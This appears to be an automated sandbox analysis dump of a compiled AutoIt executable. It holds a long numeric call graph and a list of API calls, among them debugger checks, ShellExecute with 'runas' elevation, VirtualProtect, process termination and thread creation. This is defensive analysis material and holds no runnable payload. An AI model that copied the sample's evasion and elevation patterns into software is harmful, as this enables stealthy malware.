36336c 102759->102825 102763 344850 102837 3448fd SystemParametersInfoW SystemParametersInfoW 102763->102837 102765 34485c 102838 343b3a 102765->102838 102767 344864 SystemParametersInfoW 102767->102768 102768->102679 102769->102653 102770->102657 102771->102664 102775->102680 102776->102683 102777->102689 102778->102691 102779->102696 102780->102695 102783 3687dc 102781->102783 102784 368817 102783->102784 102786 3687fa 102783->102786 102790 3751f6 102783->102790 102784->102700 102787 369de6 TlsSetValue 102784->102787 102786->102783 102786->102784 102798 36a132 Sleep 102786->102798 102787->102703 102788->102707 102789->102704 102791 375201 102790->102791 102796 37521c 102790->102796 102792 37520d 102791->102792 102791->102796 102799 368b28 58 API calls __getptd_noexit 102792->102799 102794 37522c HeapAlloc 102795 375212 102794->102795 102794->102796 102795->102783 102796->102794 102796->102795 102800 3633a1 DecodePointer 102796->102800 102798->102786 102799->102795 102800->102796 102801->102723 102802->102715 102803->102716 102804->102731 102805->102736 102806->102747 102808 368dd1 102807->102808 102813 368c59 102808->102813 102812 368dec 102812->102750 102814 368c73 _memset __call_reportfault 102813->102814 102815 368c93 IsDebuggerPresent 102814->102815 102821 36a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 102815->102821 102817 36c5f6 __ld12tod 6 API calls 102819 368d7a 102817->102819 102818 368d57 __call_reportfault 102818->102817 102820 36a140 GetCurrentProcess TerminateProcess 102819->102820 102820->102812 102821->102818 102823 36a4d4 EncodePointer 102822->102823 102823->102823 102824 36a4ee 102823->102824 102824->102754 102826 369c0b __lock 58 API calls 102825->102826 102827 363377 DecodePointer EncodePointer 102826->102827 102890 369d75 LeaveCriticalSection 102827->102890 102829 344849 102830 3633d4 102829->102830 102831 3633de 102830->102831 102832 3633f8 102830->102832 102831->102832 102891 368b28 58 API calls __getptd_noexit 102831->102891 102832->102763 102834 3633e8 102892 368db6 9 API calls __write 102834->102892 102836 3633f3 102836->102763 102837->102765 102839 343b47 __write_nolock 102838->102839 102840 347667 59 API calls 102839->102840 102841 343b51 GetCurrentDirectoryW 102840->102841 102893 343766 102841->102893 102843 343b7a IsDebuggerPresent 102844 37d272 MessageBoxA 102843->102844 102845 343b88 102843->102845 102847 37d28c 102844->102847 102845->102847 102848 343ba5 102845->102848 102877 343c61 102845->102877 102846 343c68 SetCurrentDirectoryW 102849 343c75 Mailbox 102846->102849 103026 347213 59 API calls Mailbox 102847->103026 102974 347285 102848->102974 102849->102767 102852 37d29c 102858 37d2b2 SetCurrentDirectoryW 102852->102858 102858->102849 102877->102846 102890->102829 102891->102834 102892->102836 102894 347667 59 API calls 102893->102894 102895 34377c 102894->102895 103035 343d31 102895->103035 102897 34379a 102898 344706 61 API calls 102897->102898 102899 3437ae 102898->102899 102900 347de1 59 API calls 102899->102900 102901 3437bb 102900->102901 102902 344ddd 136 API calls 102901->102902 102903 3437d4 102902->102903 102904 37d173 102903->102904 102905 3437dc Mailbox 102903->102905 103088 3a955b 102904->103088 102909 348047 59 API calls 102905->102909 102908 37d192 102911 362d55 _free 58 API calls 102908->102911 102912 3437ef 102909->102912 102910 344e4a 84 API calls 102910->102908 102913 37d19f 102911->102913 103049 34928a 102912->103049 102915 344e4a 84 API calls 102913->102915 102917 37d1a8 102915->102917 102921 343ed0 59 API calls 102917->102921 102918 347de1 59 API calls 102919 343808 102918->102919 102920 3484c0 69 API calls 102919->102920 102922 34381a Mailbox 102920->102922 102923 37d1c3 102921->102923 102924 347de1 59 API calls 102922->102924 102925 343ed0 59 API calls 102923->102925 102926 343840 102924->102926 102927 37d1df 102925->102927 102928 3484c0 69 API calls 102926->102928 102929 344706 61 API calls 102927->102929 102931 34384f Mailbox 102928->102931 102930 37d204 102929->102930 102932 343ed0 59 API calls 102930->102932 102934 347667 59 API calls 102931->102934 102933 37d210 102932->102933 102935 348047 59 API calls 102933->102935 102936 34386d 102934->102936 102937 37d21e 102935->102937 103052 343ed0 102936->103052 102939 343ed0 59 API calls 102937->102939 102941 37d22d 102939->102941 102947 348047 59 API calls 102941->102947 102943 343887 102943->102917 102944 343891 102943->102944 102945 362efd _W_store_winword 60 API calls 102944->102945 102946 34389c 102945->102946 102946->102923 102948 3438a6 102946->102948 102949 37d24f 102947->102949 102950 362efd _W_store_winword 60 API calls 102948->102950 102951 343ed0 59 API calls 102949->102951 102952 3438b1 102950->102952 102953 37d25c 102951->102953 102952->102927 102954 3438bb 102952->102954 102953->102953 102955 362efd _W_store_winword 60 API calls 102954->102955 102956 3438c6 102955->102956 102956->102941 102957 343907 102956->102957 102959 343ed0 59 API calls 102956->102959 102957->102941 102958 343914 102957->102958 103068 3492ce 102958->103068 102961 3438ea 102959->102961 102963 348047 59 API calls 102961->102963 102965 3438f8 102963->102965 102967 343ed0 59 API calls 102965->102967 102967->102957 102969 34928a 59 API calls 102971 34394f 102969->102971 102970 348ee0 60 API calls 102970->102971 102971->102969 102971->102970 102972 343ed0 59 API calls 102971->102972 102973 343995 Mailbox 102971->102973 102972->102971 102973->102843 102975 347292 __write_nolock 102974->102975 102976 37ea22 _memset 102975->102976 102977 3472ab 102975->102977 102979 37ea3e GetOpenFileNameW 102976->102979 103146 344750 102977->103146 102981 37ea8d 102979->102981 102983 347bcc 59 API calls 102981->102983 102985 37eaa2 102983->102985 102985->102985 102987 3472c9 103174 34686a 102987->103174 103026->102852 103036 343d3e __write_nolock 103035->103036 103037 347bcc 59 API calls 103036->103037 103042 343ea4 Mailbox 103036->103042 103039 343d70 103037->103039 103038 3479f2 59 API calls 103038->103039 103039->103038 103047 343da6 Mailbox 103039->103047 103040 343e77 103041 347de1 59 API calls 103040->103041 103040->103042 103044 343e98 103041->103044 103042->102897 103043 347de1 59 API calls 103043->103047 103045 343f74 59 API calls 103044->103045 103045->103042 103047->103040 103047->103042 103047->103043 103048 3479f2 59 API calls 103047->103048 103123 343f74 103047->103123 103048->103047 103050 360db6 Mailbox 59 API calls 103049->103050 103051 3437fb 103050->103051 103051->102918 103053 343ef3 103052->103053 103054 343eda 103052->103054 103055 347bcc 59 API calls 103053->103055 103056 348047 59 API calls 103054->103056 103057 343879 103055->103057 103056->103057 103058 362efd 103057->103058 103059 362f7e 103058->103059 103060 362f09 103058->103060 103131 362f90 60 API calls 3 library calls 103059->103131 103067 362f2e 103060->103067 103129 368b28 58 API calls __getptd_noexit 103060->103129 103063 362f8b 103063->102943 103064 362f15 103130 368db6 9 API calls __write 103064->103130 103066 362f20 103066->102943 103067->102943 103069 3492d6 103068->103069 103070 360db6 Mailbox 59 API calls 103069->103070 103071 3492e4 103070->103071 103073 343924 103071->103073 103132 3491fc 59 API calls Mailbox 103071->103132 103074 349050 103073->103074 103133 349160 103074->103133 103076 360db6 Mailbox 59 API calls 103078 343932 103076->103078 103077 34905f 103077->103076 103077->103078 103079 348ee0 103078->103079 103080 37f17c 103079->103080 103084 348ef7 103079->103084 103080->103084 103143 348bdb 59 API calls Mailbox 103080->103143 103082 349040 103142 349d3c 60 API calls Mailbox 103082->103142 103083 348ff8 103085 360db6 Mailbox 59 API calls 103083->103085 103084->103082 103084->103083 103087 348fff 103084->103087 103085->103087 103087->102971 103089 344ee5 85 API calls 103088->103089 103090 3a95ca 103089->103090 103144 3a9734 96 API calls 2 library calls 103090->103144 103092 3a95dc 103093 344f0b 74 API calls 103092->103093 103119 37d186 103092->103119 103094 3a95f7 103093->103094 103095 344f0b 74 API calls 103094->103095 103096 3a9607 103095->103096 103097 344f0b 74 API calls 103096->103097 103098 3a9622 103097->103098 103099 344f0b 74 API calls 103098->103099 103100 3a963d 103099->103100 103101 344ee5 85 API calls 103100->103101 103102 3a9654 103101->103102 103103 36571c __malloc_crt 58 API calls 103102->103103 103104 3a965b 103103->103104 103105 36571c __malloc_crt 58 API calls 103104->103105 103106 3a9665 103105->103106 103107 344f0b 74 API calls 103106->103107 103108 3a9679 103107->103108 103145 3a9109 GetSystemTimeAsFileTime 103108->103145 103110 3a968c 103111 3a96a1 103110->103111 103112 3a96b6 103110->103112 103113 362d55 _free 58 API calls 103111->103113 103114 3a971b 103112->103114 103115 3a96bc 103112->103115 103117 3a96a7 103113->103117 103116 362d55 _free 58 API calls 103114->103116 103118 3a8b06 116 API calls 103115->103118 103116->103119 103120 362d55 _free 58 API calls 103117->103120 103121 3a9713 103118->103121 103119->102908 103119->102910 103120->103119 103122 362d55 _free 58 API calls 103121->103122 103122->103119 103124 343f82 103123->103124 103128 343fa4 _memmove 103123->103128 103126 360db6 Mailbox 59 API calls 103124->103126 103125 360db6 Mailbox 59 API calls 103127 343fb8 103125->103127 103126->103128 103127->103047 103128->103125 103129->103064 103130->103066 103131->103063 103132->103073 103134 349169 Mailbox 103133->103134 103135 37f19f 103134->103135 103140 349173 103134->103140 103136 360db6 Mailbox 59 API calls 103135->103136 103138 37f1ab 103136->103138 103137 34917a 103137->103077 103140->103137 103141 349c90 59 API calls Mailbox 103140->103141 103141->103140 103142->103087 103143->103084 103144->103092 103145->103110 103208 371940 103146->103208 103149 34477c 103151 347bcc 59 API calls 103149->103151 103150 344799 103152 347d8c 59 API calls 103150->103152 103153 344788 103151->103153 103152->103153 103210 347726 103153->103210 103156 360791 103157 36079e __write_nolock 103156->103157 103158 36079f GetLongPathNameW 103157->103158 103159 347bcc 59 API calls 103158->103159 103160 3472bd 103159->103160 103161 34700b 103160->103161 103162 347667 59 API calls 103161->103162 103163 34701d 103162->103163 103164 344750 60 API calls 103163->103164 103165 347028 103164->103165 103166 347033 103165->103166 103170 37e885 103165->103170 103167 343f74 59 API calls 103166->103167 103169 34703f 103167->103169 103214 3434c2 103169->103214 103172 37e89f 103170->103172 103220 347908 61 API calls 103170->103220 103173 347052 Mailbox 103173->102987 103175 344ddd 136 API calls 103174->103175 103176 34688f 103175->103176 103177 37e031 103176->103177 103178 344ddd 136 API calls 103176->103178 103179 3a955b 122 API calls 103177->103179 103180 3468a3 103178->103180 103181 37e046 103179->103181 103180->103177 103182 3468ab 103180->103182 103183 37e067 103181->103183 103184 37e04a 103181->103184 103186 3468b7 103182->103186 103187 37e052 103182->103187 103185 360db6 Mailbox 59 API calls 103183->103185 103188 344e4a 84 API calls 103184->103188 103207 37e0ac Mailbox 103185->103207 103221 346a8c 103186->103221 103323 3a42f8 90 API calls _wprintf 103187->103323 103188->103187 103191 37e060 103191->103183 103193 37e260 103194 362d55 _free 58 API calls 103193->103194 103195 37e268 103194->103195 103196 344e4a 84 API calls 103195->103196 103201 37e271 103196->103201 103197 34750f 59 API calls 103197->103207 103200 362d55 _free 58 API calls 103200->103201 103201->103200 103203 344e4a 84 API calls 103201->103203 103326 39f7a1 89 API calls 4 library calls 103201->103326 103203->103201 103204 347de1 59 API calls 103204->103207 103207->103193 103207->103197 103207->103201 103207->103204 103314 39f73d 103207->103314 103317 34735d 103207->103317 103324 39f65e 61 API calls 2 library calls 103207->103324 103325 3a737f 59 API calls Mailbox 103207->103325 103209 34475d GetFullPathNameW 103208->103209 103209->103149 103209->103150 103211 347734 103210->103211 103212 347d2c 59 API calls 103211->103212 103213 344794 103212->103213 103213->103156 103215 3434d4 103214->103215 103219 3434f3 _memmove 103214->103219 103217 360db6 Mailbox 59 API calls 103215->103217 103216 360db6 Mailbox 59 API calls 103218 34350a 103216->103218 103217->103219 103218->103173 103219->103216 103220->103170 103222 346ab5 103221->103222 103223 37e41e 103221->103223 103332 3457a6 60 API calls Mailbox 103222->103332 103348 39f7a1 89 API calls 4 library calls 103223->103348 103226 37e431 103349 39f7a1 89 API calls 4 library calls 103226->103349 103227 346ad7 103333 3457f6 67 API calls 103227->103333 103229 346aec 103229->103226 103230 346af4 103229->103230 103232 347667 59 API calls 103230->103232 103234 346b00 103232->103234 103233 37e44d 103265 346b61 103233->103265 103334 360957 60 API calls __write_nolock 103234->103334 103236 346b0c 103240 347667 59 API calls 103236->103240 103237 37e460 103241 345c6f CloseHandle 103237->103241 103238 346b6f 103239 347667 59 API calls 103238->103239 103242 346b78 103239->103242 103243 346b18 103240->103243 103244 37e46c 103241->103244 103245 347667 59 API calls 103242->103245 103247 344ddd 136 API calls 103244->103247 103249 346b81 103245->103249 103248 37e488 103247->103248 103251 37e4b1 103248->103251 103254 3a955b 122 API calls 103248->103254 103252 34459b 59 API calls 103249->103252 103265->103237 103265->103238 103315 360db6 Mailbox 59 API calls 103314->103315 103316 39f76d _memmove 103315->103316 103316->103207 103318 347370 103317->103318 103320 34741e 103317->103320 103319 360db6 Mailbox 59 API calls 103318->103319 103321 3473a2 103318->103321 103319->103321 103320->103207 103321->103320 103322 360db6 59 API calls Mailbox 103321->103322 103322->103321 103323->103191 103324->103207 103325->103207 103326->103201 103332->103227 103333->103229 103334->103236 103348->103226 103349->103233 103402 341055 103407 342649 103402->103407 103405 362d40 __cinit 67 API calls 103406 341064 103405->103406 103408 347667 59 API calls 103407->103408 103409 3426b7 103408->103409 103414 343582 103409->103414 103412 342754 103413 34105a 103412->103413 103417 343416 59 API calls 2 library calls 103412->103417 103413->103405 103418 3435b0 103414->103418 103417->103412 103419 3435bd 103418->103419 103420 3435a1 103418->103420 103419->103420 103421 3435c4 RegOpenKeyExW 103419->103421 103420->103412 103421->103420 103422 3435de RegQueryValueExW 103421->103422 103423 343614 RegCloseKey 103422->103423 103424 3435ff 103422->103424 103423->103420 103424->103423 103425 341016 103430 344974 103425->103430 103428 362d40 __cinit 67 API calls 103429 341025 103428->103429 103431 360db6 Mailbox 59 API calls 103430->103431 103432 34497c 103431->103432 103433 34101b 103432->103433 103437 344936 103432->103437 103433->103428 103438 344951 103437->103438 103439 34493f 103437->103439 103441 3449a0 103438->103441 103440 362d40 __cinit 67 API calls 103439->103440 103440->103438 103442 347667 59 API calls 103441->103442 103443 3449b8 GetVersionExW 103442->103443 103444 347bcc 59 API calls 103443->103444 103445 3449fb 103444->103445 103446 347d2c 59 API calls 103445->103446 103454 344a28 103445->103454 103447 344a1c 103446->103447 103448 347726 59 API calls 103447->103448 103448->103454 103449 344a93 GetCurrentProcess IsWow64Process 103450 344aac 103449->103450 103452 344ac2 103450->103452 103453 344b2b GetSystemInfo 103450->103453 103451 37d864 103465 344b37 103452->103465 103455 344af8 103453->103455 103454->103449 103454->103451 103455->103433 103458 344ad4 103461 344b37 2 API calls 103458->103461 103459 344b1f GetSystemInfo 103460 344ae9 103459->103460 103460->103455 103462 344aef FreeLibrary 103460->103462 103463 344adc GetNativeSystemInfo 103461->103463 103462->103455 103463->103460 103466 344ad0 103465->103466 103467 344b40 LoadLibraryA 103465->103467 103466->103458 103466->103459 103467->103466 103468 344b51 GetProcAddress 103467->103468 103468->103466 103469 341066 103474 34f76f 103469->103474 103471 34106c 103472 362d40 __cinit 67 API calls 103471->103472 103473 341076 103472->103473 103475 34f790 103474->103475 103507 35ff03 103475->103507 103479 34f7d7 103480 347667 59 API calls 103479->103480 103481 34f7e1 103480->103481 103482 347667 59 API calls 103481->103482 103483 34f7eb 103482->103483 103484 347667 59 API calls 103483->103484 103485 34f7f5 103484->103485 103486 347667 59 API calls 103485->103486 103487 34f833 103486->103487 103488 347667 59 API calls 103487->103488 103489 34f8fe 103488->103489 103517 355f87 103489->103517 103493 34f930 103494 347667 59 API calls 103493->103494 103495 34f93a 103494->103495 103545 35fd9e 103495->103545 103497 34f981 103498 34f991 GetStdHandle 103497->103498 103499 3845ab 103498->103499 103500 34f9dd 103498->103500 103499->103500 103502 3845b4 103499->103502 103501 34f9e5 OleInitialize 103500->103501 103501->103471 103552 3a6b38 64 API calls Mailbox 103502->103552 103504 3845bb 103553 3a7207 CreateThread 103504->103553 103506 3845c7 CloseHandle 103506->103501 103554 35ffdc 103507->103554 103510 35ffdc 59 API calls 103511 35ff45 103510->103511 103512 347667 59 API calls 103511->103512 103513 35ff51 103512->103513 103514 347bcc 59 API calls 103513->103514 103515 34f796 103514->103515 103516 360162 6 API calls 103515->103516 103516->103479 103518 347667 59 API calls 103517->103518 103519 355f97 103518->103519 103520 347667 59 API calls 103519->103520 103521 355f9f 103520->103521 103561 355a9d 103521->103561 103524 355a9d 59 API calls 103525 355faf 103524->103525 103526 347667 59 API calls 103525->103526 103527 355fba 103526->103527 103528 360db6 Mailbox 59 API calls 103527->103528 103529 34f908 103528->103529 103530 3560f9 103529->103530 103531 356107 103530->103531 103532 347667 59 API calls 103531->103532 103533 356112 103532->103533 103534 347667 59 API calls 103533->103534 103535 35611d 103534->103535 103536 347667 59 API calls 103535->103536 103537 356128 103536->103537 103538 347667 59 API calls 103537->103538 103539 356133 103538->103539 103540 355a9d 59 API calls 103539->103540 103541 35613e 103540->103541 103542 360db6 Mailbox 59 API calls 103541->103542 103543 356145 RegisterWindowMessageW 103542->103543 103543->103493 103546 39576f 103545->103546 103547 35fdae 103545->103547 103564 3a9ae7 60 API calls 103546->103564 103548 360db6 Mailbox 59 API calls 103547->103548 103550 35fdb6 103548->103550 103550->103497 103551 39577a 103552->103504 103553->103506 103565 3a71ed 65 API calls 103553->103565 103555 347667 59 API calls 103554->103555 103556 35ffe7 103555->103556 103557 347667 59 API calls 103556->103557 103558 35ffef 103557->103558 103559 347667 59 API calls 103558->103559 103560 35ff3b 103559->103560 103560->103510 103562 347667 59 API calls 103561->103562 103563 355aa5 103562->103563 103563->103524 103564->103551 103566 343633 103567 34366a 103566->103567 103568 3436e7 103567->103568 103569 343688 103567->103569 103607 3436e5 103567->103607 103570 3436ed 103568->103570 103571 37d0cc 103568->103571 103572 343695 103569->103572 103573 34374b PostQuitMessage 103569->103573 103575 343715 SetTimer RegisterWindowMessageW 103570->103575 103576 3436f2 103570->103576 103621 351070 10 API calls Mailbox 103571->103621 103578 37d154 103572->103578 103579 3436a0 103572->103579 103580 3436d8 103573->103580 103574 3436ca DefWindowProcW 103574->103580 103575->103580 103584 34373e CreatePopupMenu 103575->103584 103581 37d06f 103576->103581 103582 3436f9 KillTimer 103576->103582 103626 3a2527 71 API calls _memset 103578->103626 103585 343755 103579->103585 103586 3436a8 103579->103586 103594 37d074 103581->103594 103595 37d0a8 MoveWindow 103581->103595 103618 34443a Shell_NotifyIconW _memset 103582->103618 103583 37d0f3 103622 351093 331 API calls Mailbox 103583->103622 103584->103580 103611 3444a0 103585->103611 103590 3436b3 103586->103590 103591 37d139 103586->103591 103597 3436be 103590->103597 103598 37d124 103590->103598 103591->103574 103625 397c36 59 API calls Mailbox 103591->103625 103592 37d166 103592->103574 103592->103580 103599 37d097 SetFocus 103594->103599 103600 37d078 103594->103600 103595->103580 103596 34370c 103619 343114 DeleteObject DestroyWindow Mailbox 103596->103619 103597->103574 103623 34443a Shell_NotifyIconW _memset 103597->103623 103624 3a2d36 81 API calls _memset 103598->103624 103599->103580 103600->103597 103601 37d081 103600->103601 103620 351070 10 API calls Mailbox 103601->103620 103606 37d134 103606->103580 103607->103574 103609 37d118 103610 34434a 68 API calls 103609->103610 103610->103607 103612 3444b7 _memset 103611->103612 103613 344539 103611->103613 103614 34407c 61 API calls 103612->103614 103613->103580 103616 3444de 103614->103616 103615 344522 KillTimer SetTimer 103615->103613 103616->103615 103617 37d4ab Shell_NotifyIconW 103616->103617 103617->103615 103618->103596 103619->103580 103620->103580 103621->103583 103622->103597 103623->103609 103624->103606 103625->103607 103626->103592 103627 38416f 103631 395fe6 103627->103631 103629 38417a 103630 395fe6 85 API calls 103629->103630 103630->103629 103632 396020 103631->103632 103636 395ff3 103631->103636 103632->103629 103633 396022 103643 349328 84 API calls Mailbox 103633->103643 103634 396027 103637 349837 84 API calls 103634->103637 103636->103632 103636->103633 103636->103634 103640 39601a 103636->103640 103638 39602e 103637->103638 103639 347b2e 59 API calls 103638->103639 103639->103632 103642 3495a0 59 API calls _wcsstr 103640->103642 103642->103632 103643->103634 103644 34107d 103649 34708b 103644->103649 103646 34108c 103647 362d40 __cinit 67 API calls 103646->103647 103648 341096 103647->103648 103650 34709b __write_nolock 103649->103650 103651 347667 59 API calls 103650->103651 103652 347151 103651->103652 103653 344706 61 API calls 103652->103653 103654 34715a 103653->103654 103680 36050b 103654->103680 103657 347cab 59 API calls 103658 347173 103657->103658 103659 343f74 59 API calls 103658->103659 103660 347182 103659->103660 103661 347667 59 API calls 103660->103661 103662 34718b 103661->103662 103663 347d8c 59 API calls 103662->103663 103664 347194 RegOpenKeyExW 103663->103664 103665 3471b6 Mailbox 103664->103665 103666 37e8b1 RegQueryValueExW 103664->103666 103665->103646 103667 37e943 RegCloseKey 103666->103667 103668 37e8ce 103666->103668 103667->103665 103679 37e955 _wcscat Mailbox __wsetenvp 103667->103679 103669 360db6 Mailbox 59 API calls 103668->103669 103670 37e8e7 103669->103670 103672 34522e 59 API calls 103670->103672 103671 3479f2 59 API calls 103671->103679 103673 37e8f2 RegQueryValueExW 103672->103673 103674 37e90f 103673->103674 103676 37e929 103673->103676 103675 347bcc 59 API calls 103674->103675 103675->103676 103676->103667 103677 347de1 59 API calls 103677->103679 103678 343f74 59 API calls 103678->103679 103679->103665 103679->103671 103679->103677 103679->103678 103681 371940 __write_nolock 103680->103681 103682 360518 GetFullPathNameW 103681->103682 103683 36053a 103682->103683 103684 347bcc 59 API calls 103683->103684 103685 347165 103684->103685 103685->103657 103686 1696410 103700 1694030 103686->103700 103688 16964d0 103703 1696300 103688->103703 103706 1697510 GetPEB 103700->103706 103702 16946bb 103702->103688 103704 1696309 Sleep 103703->103704 103705 1696317 103704->103705 103707 169753a 103706->103707 103707->103702 103708 37fdfc 103741 34ab30 Mailbox _memmove 103708->103741 103713 34b525 103775 3a9e4a 89 API calls 4 library calls 103713->103775 103715 380055 103774 3a9e4a 89 API calls 4 library calls 103715->103774 103718 34b475 103726 348047 59 API calls 103718->103726 103720 360db6 59 API calls Mailbox 103732 349f37 Mailbox 103720->103732 103721 348047 59 API calls 103721->103732 103722 380064 103723 34b47a 103723->103715 103736 3809e5 103723->103736 103730 34a057 103726->103730 103728 347667 59 API calls 103728->103732 103729 396e8f 59 API calls 103729->103732 103731 362d40 67 API calls __cinit 103731->103732 103732->103715 103732->103718 103732->103720 103732->103721 103732->103723 103732->103728 103732->103729 103732->103730 103732->103731 103734 3809d6 103732->103734 103737 34a55a 103732->103737 103763 34c8c0 331 API calls 2 library calls 103732->103763 103764 34b900 60 API calls Mailbox 103732->103764 103733 347de1 59 API calls 103733->103741 103780 3a9e4a 89 API calls 4 library calls 103734->103780 103781 3a9e4a 89 API calls 4 library calls 103736->103781 103779 3a9e4a 89 API calls 4 library calls 103737->103779 103740 34b2b6 103768 34f6a3 331 API calls 103740->103768 103741->103713 103741->103730 103741->103732 103741->103733 103741->103740 103742 349ea0 331 API calls 103741->103742 103744 38086a 103741->103744 103746 380878 103741->103746 103748 38085c 103741->103748 103749 34b21c 103741->103749 103751 360db6 59 API calls Mailbox 103741->103751 103753 396e8f 59 API calls 103741->103753 103757 3bdf23 103741->103757 103760 3bdf37 103741->103760 103765 349c90 59 API calls Mailbox 103741->103765 103769 3bc193 85 API calls 2 library calls 103741->103769 103770 3bc2e0 96 API calls Mailbox 103741->103770 103771 3a7956 59 API calls Mailbox 103741->103771 103772 3bbc6b 331 API calls Mailbox 103741->103772 103773 39617e 59 API calls Mailbox 103741->103773 103742->103741 103777 349c90 59 API calls Mailbox 103744->103777 103778 3a9e4a 89 API calls 4 library calls 103746->103778 103748->103730 103776 39617e 59 API calls Mailbox 103748->103776 103766 349d3c 60 API calls Mailbox 103749->103766 103751->103741 103752 34b22d 103767 349d3c 60 API calls Mailbox 103752->103767 103753->103741 103782 3bcadd 103757->103782 103759 3bdf33 103759->103741 103761 3bcadd 130 API calls 103760->103761 103762 3bdf47 103761->103762 103762->103741 103763->103732 103764->103732 103765->103741 103766->103752 103767->103740 103768->103713 103769->103741 103770->103741 103771->103741 103772->103741 103773->103741 103774->103722 103775->103748 103776->103730 103777->103748 103778->103748 103779->103730 103780->103736 103781->103730 103783 349837 84 API calls 103782->103783 103784 3bcb1a 103783->103784 103803 3bcb61 Mailbox 103784->103803 103820 3bd7a5 103784->103820 103786 3bcdb9 103787 3bcf2e 103786->103787 103792 3bcdc7 103786->103792 103859 3bd8c8 92 API calls Mailbox 103787->103859 103790 3bcf3d 103790->103792 103793 3bcf49 103790->103793 103791 349837 84 API calls 103810 3bcbb2 Mailbox 103791->103810 103833 3bc96e 103792->103833 103793->103803 103798 3bce00 103848 360c08 103798->103848 103801 3bce1a 103854 3a9e4a 89 API calls 4 library calls 103801->103854 103802 3bce33 103805 3492ce 59 API calls 103802->103805 103803->103759 103807 3bce3f 103805->103807 103806 3bce25 GetCurrentProcess TerminateProcess 103806->103802 103808 349050 59 API calls 103807->103808 103809 3bce55 103808->103809 103817 3bce7c 103809->103817 103855 348d40 59 API calls Mailbox 103809->103855 103810->103786 103810->103791 103810->103803 103852 3bfbce 59 API calls 2 library calls 103810->103852 103853 3bcfdf 61 API calls 2 library calls 103810->103853 103811 3bcfa4 103811->103803 103816 3bcfb8 FreeLibrary 103811->103816 103813 3bce6b 103856 3bd649 107 API calls _free 103813->103856 103816->103803 103817->103811 103857 348d40 59 API calls Mailbox 103817->103857 103858 349d3c 60 API calls Mailbox 103817->103858 103860 3bd649 107 API calls _free 103817->103860 103821 347e4f 59 API calls 103820->103821 103822 3bd7c0 CharLowerBuffW 103821->103822 103861 39f167 103822->103861 103826 347667 59 API calls 103827 3bd7f9 103826->103827 103828 34784b 59 API calls 103827->103828 103829 3bd810 103828->103829 103830 347d2c 59 API calls 103829->103830 103831 3bd81c Mailbox 103830->103831 103832 3bd858 Mailbox 103831->103832 103868 3bcfdf 61 API calls 2 library calls 103831->103868 103832->103810 103834 3bc989 103833->103834 103838 3bc9de 103833->103838 103835 360db6 Mailbox 59 API calls 103834->103835 103836 3bc9ab 103835->103836 103837 360db6 Mailbox 59 API calls 103836->103837 103836->103838 103837->103836 103839 3bda50 103838->103839 103840 3bdc79 Mailbox 103839->103840 103847 3bda73 _strcat _wcscpy __wsetenvp 103839->103847 103840->103798 103841 349be6 59 API calls 103841->103847 103842 349b3c 59 API calls 103842->103847 103843 349b98 59 API calls 103843->103847 103844 349837 84 API calls 103844->103847 103845 36571c 58 API calls __malloc_crt 103845->103847 103847->103840 103847->103841 103847->103842 103847->103843 103847->103844 103847->103845 103871 3a5887 61 API calls 2 library calls 103847->103871 103850 360c1d 103848->103850 103849 360cb5 VirtualProtect 103851 360c83 103849->103851 103850->103849 103850->103851 103851->103801 103851->103802 103852->103810 103853->103810 103854->103806 103855->103813 103856->103817 103857->103817 103858->103817 103859->103790 103860->103817 103862 39f192 __wsetenvp 103861->103862 103863 39f1d1 103862->103863 103865 39f1c7 103862->103865 103867 39f278 103862->103867 103863->103826 103863->103831 103865->103863 103869 3478c4 61 API calls 103865->103869 103867->103863 103870 3478c4 61 API calls 103867->103870 103868->103832 103869->103865 103870->103867 103871->103847

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B68
                                              • IsDebuggerPresent.KERNEL32 ref: 00343B7A
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BEB
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                • Part of subcall function 0035092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C14,004052F8,?,?,?), ref: 0035096E
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00343C6F
                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F7770,00000010), ref: 0037D281
                                              • SetCurrentDirectoryW.KERNEL32(?,004052F8,?,?,?), ref: 0037D2B9
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003F4260,004052F8,?,?,?), ref: 0037D33F
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 0037D346
                                                • Part of subcall function 00343A46: GetSysColorBrush.USER32(0000000F), ref: 00343A50
                                                • Part of subcall function 00343A46: LoadCursorW.USER32(00000000,00007F00), ref: 00343A5F
                                                • Part of subcall function 00343A46: LoadIconW.USER32(00000063), ref: 00343A76
                                                • Part of subcall function 00343A46: LoadIconW.USER32(000000A4), ref: 00343A88
                                                • Part of subcall function 00343A46: LoadIconW.USER32(000000A2), ref: 00343A9A
                                                • Part of subcall function 00343A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AC0
                                                • Part of subcall function 00343A46: RegisterClassExW.USER32(?), ref: 00343B16
                                                • Part of subcall function 003439D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A03
                                                • Part of subcall function 003439D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A24
                                                • Part of subcall function 003439D5: ShowWindow.USER32(00000000,?,?), ref: 00343A38
                                                • Part of subcall function 003439D5: ShowWindow.USER32(00000000,?,?), ref: 00343A41
                                                • Part of subcall function 0034434A: _memset.LIBCMT ref: 00344370
                                                • Part of subcall function 0034434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00344415
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
